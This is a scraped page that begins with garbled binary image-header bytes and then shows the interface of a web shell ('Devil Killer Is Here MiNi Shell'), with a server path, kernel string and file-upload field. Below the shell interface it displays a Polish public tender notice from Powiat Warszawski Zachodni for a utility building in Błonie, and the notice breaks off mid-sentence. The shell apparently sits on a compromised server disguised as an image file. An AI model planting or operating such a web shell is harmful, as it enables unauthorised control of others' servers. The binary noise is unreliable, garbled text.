JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210823/0015750701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty budowlane polegające na budowie budynku gospodarczego wraz z zagospodarowaniem terenu na działce nr ew.3/1, 2/2, 4/2 obręb 0008 w Błoniu – zamówienie podstawowe wraz z prawem opcji. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT WARSZAWSKI ZACHODNI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013271996</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Poznańska 129/133</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ożarów Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-850</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 733 72 12</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@pwz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.pwz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty budowlane polegające na budowie budynku gospodarczego wraz z zagospodarowaniem terenu na działce nr ew.3/1, 2/2, 4/2 obręb 0008 w Błoniu – zamówienie podstawowe wraz z prawem opcji. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c0803b5e-041b-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00157507</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000399/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Roboty budowane polegające na budowie budynku gospodarczego wraz z zagospodarowaniem terenu na działce nr ew. 3/1, 2/2, 4/2 obręb 0008 w Błoniu - zamówienie podstawowe wraz z prawem opcji.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.pwz.pl/redir,przetargi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl, ePUAP<br/>https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu (dostępnym pod<br/>adresem:https://miniportal.uzp.gov.pl/WarunkiUslugi) oraz Warunkach korzystania z elektronicznej<br/>platformy usług administracji publicznej ePUAP (dostępnych pod adresem:<br/>https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin).Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>komunikacji wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO stanowi rozdz. XXX<br/>SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZA.272.1.10.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 227083,76 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 198221,97 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Niniejsze zamówienie (część II ) obejmuje wykonanie prac budowlanych związanych z budową budynku gospodarczego oraz dwóch wiat na działce nr 4/2 zlokalizowanej w Błoniu przy ul. Lesznowskiej przy istniejącym budynku Komendy Powiatowej Straży Pożarnej oraz budynku komory dymowej wraz ze ścieżką edukacyjną „Ognik”. W projektowanym budynku będą mieścić się 2 pomieszczenia gospodarcze oraz 2 wydzielone przestrzenie w części wiaty zewnętrznej gospodarczej. Budynek jest niepodpiwniczony, parterowy o wysokości 3,71 m. Wejścia do pomieszczeń gospodarczych w budynku zlokalizowane zostały od wschodniej strony. Wejścia do wiat zewnętrznych przewidziane zostały w południowej i zachodniej części. Wiaty wydzielone zostaną ogrodzeniami palisadowymi poziomymi ( przęsła z profila 80x20mm, odstęp między profilami 35mm) Przewiduje się wykonanie bryły budynku w spokojnej tonacji kolorystycznej od bieli, jasnej szarości i grafitu.<br/>2.	Parametry techniczne Powierzchnia netto: 37,11 m2 Kubatura : 62,40 m3 Wysokość budynku: 3,71 m Ilość kondygnacji: I (parter). Teren przeznaczony pod planowaną inwestycję jest płaski a poziom istniejącego terenu waha się od rzędnej 89.6 m n.p.m do 89.8 m n.p.m.<br/>3.	Przewiduje się wyposażenie budowanego obiektu w instalację elektryczną i wodno-kanalizacyjną zgodnie z PZT oraz projektami poszczególnych branż. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44160000-9 - Rurociągi, instalacje rurowe, rury, okładziny rurowe, rury i podobne elementy</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45324000-4 - Roboty w zakresie okładziny tynkowej</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 121999,52 zł <br/>6.	Prawo opcji może być wdrożone w ciągu 14 dni od dnia zawarcia umowy. <br/><br/>7.	Realizacja prawa opcji będzie przebiegać w następujący sposób:<br/>1)	Zamawiający poinformuje Wykonawcę o woli skorzystania z prawa opcji pisemnie, na co najmniej tydzień przed planowanym terminem wdrożenia prawa opcji;<br/>2)	Zamawiający wraz z informacją, o której mowa w ppkt.1) powyżej przekaże pisemne oświadczenie wykonania zamówienia objętego prawem opcji. Termin rozpoczęcia i zakończenia przez Wykonawcę realizacji zadania objętego prawem opcji zostanie uwzględniony w harmonogramie rzeczowo-finansowym po otrzymaniu zgłoszenia, o którym mowa powyżej. Termin realizacji zamówienia objętego prawem opcji wynosi 40 dni kalendarzowych od daty przesłania do Wykonawcy oświadczenia o uruchomieniu prawa opcji. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1.	Zamawiający informuje, że przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp., dotychczasowemu Wykonawcy robót budowlanych, polegającego na powtórzeniu podobnych robót budowlanych (tj. roboty w zakresie określonym kodami CPV w rozdz. III SWZ), w okresie 3 lat od udzielenia zamówienia podstawowego.<br/>Zamawiający przewiduje w szczególności udzielenie zamówienia na wykonanie robót budowlanych, polegających na wykonaniu robót obejmujących roboty rozbiórkowe, roboty murarskie tynkarskie, malarskie, wykończeniowe w tym kładzenie glazury i terakoty, wykonywanie sieci i instalacji wewnętrznych i zewnętrznych, montaż niezbędnej armatury.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	Zamawiający uzna warunek za spełniony gdy Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał dwie roboty budowlane polegające na wykonaniu prac związanych z budową obiektów budowlanych kubaturowych o min. powierzchni użytkowej 35m2 o wartości co najmniej 100 000,00 zł brutto (sto tysięcy złotych 00/100) w przypadku każdej z tych robót. <br/>b)	Ponadto Zamawiający uzna warunek za spełniony gdy Wykonawca wykaże, że skieruje do realizacji zamówienia: jedną osobę przewidzianą do pełnienia funkcji kierownika robót, posiadającą uprawnienia wykonawcze konstrukcyjno -budowlane do kierowania robotami lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniejszej obowiązujących przepisów, a które upoważniają do pełnienia tych funkcji w przedmiotowym zakresie, wraz z wpisaniem do właściwej izby samorządu zawodowego oraz posiadającą co najmniej 3-letnie doświadczenie na stanowisku kierownika budowy lub kierownika robót. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <br/>b)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej w zakresie art.<br/>108 ust. 1 pkt 5 ustawy Pzp.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty Wykonawca dołącza aktualne na dzień składania ofert oświadczenie w zakresie<br/>wskazanym przez Zamawiającego w SWZ stanowiące załącznik nr 2 do SWZ.Należy również<br/>złożyć jeżeli dotyczy: Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy<br/>do dyspozycji niezbędnych zasobów; Oświadczenie podmiotu o spełnianiu warunków udziału w<br/>postępowaniu oraz o niepodleganiu wykluczeniu; Oświadczenie składane przez Wykonawców<br/>wspólnie ubiegających się o zamówienie; Oświadczenie wykonawcy o przynależności lub braku<br/>przynależności do grupy kapitałowej; Upoważnienie (pełnomocnictwo) do podpisania oferty, do<br/>poświadczania dokumentów za zgodność z oryginałem należy dołączyć do oferty, o ile nie<br/>wynika ono z dokumentów rejestrowych Wykonawcy które Zamawiający może uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi zostać zabezpieczona wadium w wysokości 7 000,00 zł (słownie: siedem tysięcy<br/>złotych 00/100).2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje<br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których<br/>mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.3. Wadium może być wnoszone według<br/>wyboru Wykonawcy w jednej lub kilku następujących formach:1) pieniądzu;2) gwarancjach<br/>bankowych;3) gwarancjach ubezpieczeniowych;4) poręczeniach udzielanych przez podmioty, o<br/>których mowa w art. 6b ust. 5 pkt 2 ustawy z 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (t.j. Dz.U. z 2019 r. poz. 310 ze zm.).4. Wadium wnoszone w formie<br/>pieniężnej należy wpłacać na rachunek bankowy Zamawiającego:Bank Pekao S.A. nr rachunku<br/>96 1240 6973 1111 0010 8703 3903Zalecany tytuł przelewu: "Wadium – IZA.272.1.4.2021”5. W<br/>przypadku wpłaty wadium w pieniądzu z konta prywatnego (brak nazwy firmy Wykonawcy w<br/>nazwie konta), do tytułu przelewu należy dodać informację o nazwie Wykonawcy, którego oferta<br/>zostaje zabezpieczona.6. W przypadku wnoszenia wadium w pieniądzu, Zamawiający uzna je<br/>za wniesione skutecznie jedynie w przypadku wpływu pieniędzy na rachunek bankowy<br/>Zamawiającego przed upływem terminu składania ofert.7. Wadium wnoszone w postaci<br/>niepieniężnej należy złożyć wraz z ofertą poprzez miniPortal - w wydzielonym, odrębnym pliku.<br/>Należy przekazać oryginał gwarancji lub poręczenia w postaci elektronicznej.8. Z treści<br/>gwarancji (poręczenia) musi jednoznacznie wynikać nieodwoływalne i bezwarunkowe, na każde<br/>żądanie zgłoszone przez Zamawiającego, zobowiązanie gwaranta (poręczyciela) do zapłaty<br/>Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy<br/>Pzp. Ponadto powinien być wskazany termin obowiązywania gwarancji (poręczenia), który nie<br/>może być krótszy niż termin związania ofertą.9. Zwrot wadium z urzędu: Zamawiający zwraca<br/>wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z<br/>okoliczności wskazanych w art. 98 ust. 1 pkt 1-3 ustawy Pzp.10. Zwrot wadium na wniosek<br/>Wykonawcy: Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>złożenia wniosku zwraca wadium Wykonawcy:1) który wycofał ofertę przed upływem terminu<br/>składania ofert;2) którego oferta została odrzucona;3) po wyborze najkorzystniejszej oferty, z<br/>Ogłoszenie nr 2021/BZP 00013414/01 z dnia 2021-03-04<br/>2021-03-04 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza;4) po<br/>unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.11. Zamawiający zatrzymuje<br/>wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie innej niż w pieniądzu,<br/>występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium w przydatkach<br/>określonych w art. 98 ust. 6 ustawy Pzp.12. Jeżeli Wykonawca jest podmiotem niepodlegającym<br/>reżimowi prawa polskiego i właściwości sądów polskich, w treści gwarancji musi figurować zapis<br/>o poddaniu sporów wynikających z wadium prawu polskiemu i polskiemu sądownictwu. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.2. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.3. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne<br/>pełnomocnictwo, nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy<br/>wspólnicy podpiszą ofertę.4. Oferta musi być podpisana w taki sposób, by prawnie<br/>zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z<br/>Wykonawców lub upoważnionego pełnomocnika).5. W przypadku wspólnego ubiegania się o<br/>udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ust. 1<br/>ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w<br/>którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie<br/>warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:1)<br/>Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;2) Oświadczenie o spełnianiu warunków<br/>udziału składa podmiot, który w odniesieniu do danego warunku udziału w 